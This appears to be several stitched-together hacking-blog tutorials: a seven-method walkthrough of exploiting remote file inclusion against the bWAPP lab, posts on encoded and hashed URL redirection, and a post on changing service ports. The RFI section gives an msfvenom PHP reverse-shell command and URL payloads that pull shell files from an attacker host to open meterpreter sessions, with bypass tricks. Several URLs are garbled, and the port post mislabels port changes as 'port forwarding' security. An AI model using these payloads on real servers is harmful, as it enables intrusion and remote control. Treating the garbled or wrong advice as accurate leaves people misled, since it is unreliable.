7 ways to Exploit RFI Vulnerability

In this article you will learn how to hack any web application server if it is suffering from remote file inclusion vulnerability.  I have performed RFI attack using seven different techniques to exploit any web server. Here I have targeted BWAPP which a buggy web application server to perform all these attack.

Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

For more details visit OWASP.org

Let’s Begin!!!

Basic RFI Attack

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which is suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, when you click on go button the selected language file get included in URL.

 Now prepare PHP malicious file using msfvenom for attack and start multi handler at the background.

Msfvenom –p php/meterpreter/reverse _tcp lhost= 192.168.1.11 lport 4444 –f raw

Then copy the highlighted text in a text file.

If you notice the below screenshot carefully here you will find that I have saved above copied PHP code as shell.php inside /var/www/html, so that shell.php file could be included for RFI attack.

To perform basic attacks manipulate URL to include php file remotely.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php

As soon as you will execute the URL, you will get reverse connection through meterpreter session.

Meterpreter> sysinfo

Forced Extension RFI Attack

Repeat the same process and add ‘?’ (Question mark) symbol at the end of URL. Must remember that multi handler should be running at the background of metasploit framework.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php?

Again when you will execute URL, it will give you another meterpreter session.

Meterpreter> sysinfo

Null Byte RFI Attack

Now to make null byte attack you need to capture the sending request between browser and web server. Here to perform the attack with help of burp suite kindly turn on burp suite then make intercept on and set browser proxy. From given screenshot you can see I have captured the GET request.

Again if you notice the highlighted text in the given below image you will find that I have edited ‘’ (null character) to make null injection attack. Now before forwarding the GET request make sure your multi handler must be running at the background and then click on forward tab.

As soon as they GET request will be forward you will get victim’s reverse connection through meterpreter sessions.

Meterpreter> sysinfo

Change HTTP

The forth technique is similar to the first technique the attacker just need to make very small change in URL and if you notice the following screenshot you will find that I have changed http into HTTP. It might be possible that in some situation when security level get increased small character http get failed to include file remotely. 

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=HTTP://192.168.1.11/shell.php

So after making changes now execute the URL and must keep multi handler running at the background which will further provide a new session again through meterpreter.

Meterpreter> sysinfo

Change Image Extension

In next attack you will find that I had included an image remotely to hack web application server which is not a real image but our php malicious file. So now open your shell.php file and edit GIF98 inside your PHP file as shown in following screenshot and save it as shell.gif at same location i.e. /var/www/html.

Here again make small change in URL to include malicious image.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.gif

Now when again you will execute URL, another meterpreter session gets open for you.

Meterpreter> sysinfo

Black List RFI Attack

If you have read  file uploading article you must be aware of black list where we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHP or PHP3

You can apply this technique when security level is high, manipulate .php into .PHP; I have renamed shell.php into shell.PHP at same location and then execute shell.PHP with help of URL.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.PHP

From following screenshot you can see I have got another session through meterpreter.

Meterpreter> sysinfo

Base64 encoded

 Now there is another way to exploit RFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

With help of hackbar which a Firefox plug-in I had performed this attack. First you need to load URL then manipulate URL as shown in the screenshot then click on execute tab.

http://192.168.1.113/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource= http://192.168.1.11/shell.php

WONDERFUL!!! We have got meterpreter session through seven different techniques. You can also perform all these attack using online script like c99 shell.

Meterpreter> sysinfo

Understanding Redirection with Hashing and Crypto Salt (Part 2)

In previous article we have explained the concept of redirection with basic redirection and encoded redirections; in this article we will cover the more secured redirection using hashing and salting techniques.

In this article also we will be covering the redirection using the same php scripts with little modification within the code.

Redirection using Hash Values

On browser type http://localhost/hashing/home.php

Hover on Redirect Link pointing to redirection page (re.php). We can see that the redirection link not only contains the URL as a parameter but also the hash which means that we are not only passing the URL as a parameter but also generating the hash value using MD5/SH1/SHA512 or any of the hashing algorithm and redirection will only work if the combination of url and its hash is correct else not.

(Shown in the figure below). This is a more secure way of redirection.

 For the sake of understanding our redirection link is showing the parameters like URL and Hash but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

When we click on Redirect Link redirection script  on re.php will catch the passed URL and generate its hash value (we are using MD5 hash algorithm) and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

WE are using hash calculator for generating the MD5 Value of "http://www.hackingarticles.in".

The MD5 hash value of "http://www.hackingarticles.in" is 8258c1efb05943d059476150cb22df1d

 In the below image we are replacing the original hash value of "http://www.hackingarticles.in"   from its original value which is "8258c1efb05943d059476150cb22df1d" to any different value for example "9258c1efb05943d059476150cb22df1d" (we have replaced only first digit from 8 to 9).

The redirection has failed and script has returned an error message. Finally we are sending the URL along with the generated Hash Value as parameter and result is below

Redirection using Hash Values with salting

On browser type http://localhost/hashing/home.php (page where we have our scripts)

Hover on Redirect Link pointing to redirection page (re.php). Here we can see one more additional parameter salt. As in previous methodology we have worked with Hash values , while working with salting we are introducing  one more parameter salt and generating the hash value of the URL by pre pending or appending the salt value in front of the url or at the end of the url. Salt value could be anything, it could be a combination of characters, digits , alphanumeric , special character or anything we want (In this example we are using the salt value "ignite"). By using salts we are further increasing the security for redirecting the URL.

  For the sake of understanding our redirection link is showing the parameters like URL and Hash and Salt but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

 When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using Sha1 hash algorithm) by appending the salt value (ignite) in front of the URL and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

in Above image we are generating the Sha1 hash value by appending the salt "ignite"  in front of the URL "http://www.hackingarticles.in" , we can use any online/offline convertor in this example we are generating Sha1 hash through http://online-code-generator.com/sha1-hash-with-optional-salt.php

The sha1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626

If the hash value sent is different from the original value our script will return an error. In below Image we are changing the sha1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (we are replacing only first digit from 5 to 8) we will get the following result.

Finally we are sending the URL along with the generated Hash Value as parameter and result is below

Understanding Redirection with Encoding Techniques (Part 1)

A redirect automatically sends website's visitors to some different location or URL; redirection could be either at different location within the same site or a new site or webpage.

Unsecure redirection and forwarding are the outcomes when a web application accepts untrusted inputs that could cause the web application to redirect the request to a URL contained within untrusted/Unvalidated input, we can also call this type of redirection as Unvalidated Redirection.

We are demonstrating the actual concept and types of redirection through a PHP code running under apache server on a local machine running kali Linux. We can also use wamp or xampp server for windows machine to run and execute these codes. For executing our redirection scripts, put the codes in /var/www/html directory: This is the directory pointing to localhost (in our case).

References

 http://php.net/manual/en/function.header.php

https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Basic Redirection

On browser type localhost/redirect/home.php

Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below. (As shown in the figure below). 

When we click on this link, we will be redirected to http://www.hackingarticles.in, as we have coded in our redirection script (re.php).

This is the basic redirection where we are simply redirecting the users from one page to another page through php scripts without considering any security measures in account. The further encoding parameters of redirection are explained below.

URL Encoding

On browser type localhost/hex/home.php (page where we have our scripts)

Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below.(As shown in the figure below).

Here we are using the same script for the home page but in this redirection we are using simple URL encoding where we can send our URL in URL Encoded format  and the encoded URL is being decoded through the script running on our redirected php page(re.php in this case).

WE can use any online /offline converter for calculating URL encoded value (in this example we are using http://www.meyerweb.com/)

Refer below screenshot for URL encoding.

 Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with URL encoded value we will land on the same page.

The following is the result

HEX Encoding

Here we are converting the URL in its Hexadecimal Value using Burp suite (you can use any online/offline tool).

Single Hex encoded value of http://www.hackingarticles.in is

%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with single hex encoded value we will land on the same page

The following is the result

Multilevel Encoding

Here we are demonstrating the multilevel encoding where we are re-encoding the pre encoded values.

Double Hex encoded value of http://www.hackingarticles.in is

%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with double hex encoded value we will land on the same page.

The following is the result

Base 64 Encoded Redirection

On browser type http://localhost/base64/home.php

Hover on Redirect Link, pointing to redirection page (re.php). Here we are pre encoding our URL to its base 64 encoded value because of which our URL is something which can't be understandable with naked eye .(As shown in the figure below). 

 Below image shows the Base64 encoding of our URL http://www.hackingarticles.in

Base64 encoded value of http://www.hackingarticles.in is

 “aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4=”

The following is the output

How to Secure Your Port using Port Forwarding

In this article I am going to perform how to use port forwarding in a system which is a process that redirects a communication request from a specific port to another port or host. It is basically allows an outside computer to connect to a computer in a private local area network. Some commonly done port forwarding includes forwarding port 22 for SSH access, forwarding port 80 for web servers and port 21 for FTP. The major advantage is that it provides security to your private network and secure communication

.

Let’s start !!!!

HTTP and HTTPS forwarding

Open ports.conf file from inside /etc/apache2 and type following command to read the configuration.

Cat ports.conf

From screenshot you can view the present listening port 80 and 443 for web server.

If an attacker wants to send malicious file through web server he will try to connect with target using port 80 send the phishing page to the target.

In order to protect you from being targeted through phishing page change the port number from 80 and 443 into other number. 

If you notice the following screenshot here you will that I have modified port 80 into 8088 and port 443 into 44343.

FTP port forwarding

Now open the vsftpd.conf file from inside /etc.

From screenshot you can view listen port is 21 by default, to protect yourself from FTP attacks shift the FTP service on other port.

From given below screenshot you will find that I have change port21 into 2121

SSH port forwarding

Open file sshd_config from / etc/ssh/ssd_config

From screenshot you will find that by default port 22 is use as listen port which is badly affected by DDOS attack. Here to protect yourself apply port forwarding techniques on port 22.

From below image, again you will notice that I have change port 22 into port 2222.

Now if you will scan your network with help of NMAP you will find that the services FTP, HTTP and SSH is successfully running on the modified ports.

Nmap –p- -sV 192.168.1.24